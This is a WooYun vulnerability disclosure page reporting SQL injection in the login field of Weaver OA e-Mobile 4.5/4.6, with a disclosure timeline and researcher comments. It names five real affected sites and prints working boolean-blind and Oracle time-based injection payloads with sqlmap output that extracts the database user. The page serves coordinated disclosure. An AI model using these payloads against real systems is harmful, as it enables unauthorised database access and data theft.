当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104678

漏洞标题:泛微oa某系统通用注入漏洞(5案例)

相关厂商:CNCERT

漏洞作者: Vigoss_Z

提交时间:2015-03-30 09:46

修复时间:2015-07-02 10:28

公开时间:2015-07-02 10:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

rt

详细说明:

泛微oa的e-Mobile系统注入漏洞,
http://emobile.weaver.com.cn/case.html
具体的:
http://oa.chinajiutai.com:89/login.do
http://www.fsxtx.cn/login.do
http://m.zxhsd.com/login.do
http://wap.helichina.com
http://m.liando.cn
4.5,4.6版本存在注入。
登陆框用户名处注入,'or'1'='1 密码错误。盲注和延时注入。
Oracle,MSSQL的数据库。

00007.JPG


Host: wap.helichina.com

Parameter: loginid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: loginid=-7599' OR (8705=8705) AND 'nhkT'='nhkT&password=1&authcode=
&dynapass=&tokenpass=&clienttype=Webclient&clientver=4.5&language=&country=&veri
fy=&needdyna=
    Vector: OR ([INFERENCE])
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: loginid=1' AND 1965=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(116)||CH
R(90)||CHR(80),5) AND 'cdiy'='cdiy&password=1&authcode=&dynapass=&tokenpass=&cli
enttype=Webclient&clientver=4.5&language=&country=&verify=&needdyna=
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAG
E('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
---
[INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[INFO] fetching current user
[PAYLOAD] -6526
[INFO] resumed: OA
[DEBUG] performed 0 queries in 0.00 seconds
current user:    'OA'


漏洞证明:

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-04-03 10:27

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-30 09:54 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    泛微、

  2. 2015-03-30 09:56 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    OA、

  3. 2015-03-30 10:06 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    只有5个案例

  4. 2015-03-30 10:17 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @动后河 你是审核??

  5. 2015-03-30 10:24 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

    泛微各种注入,蛋疼的是表多的要命

  6. 2015-07-02 11:03 | 蓝冰 ( 核心白帽子 | Rank:627 漏洞数:50 | -.-)

    我晕了 原来有人发这个了啊...为毛搜不到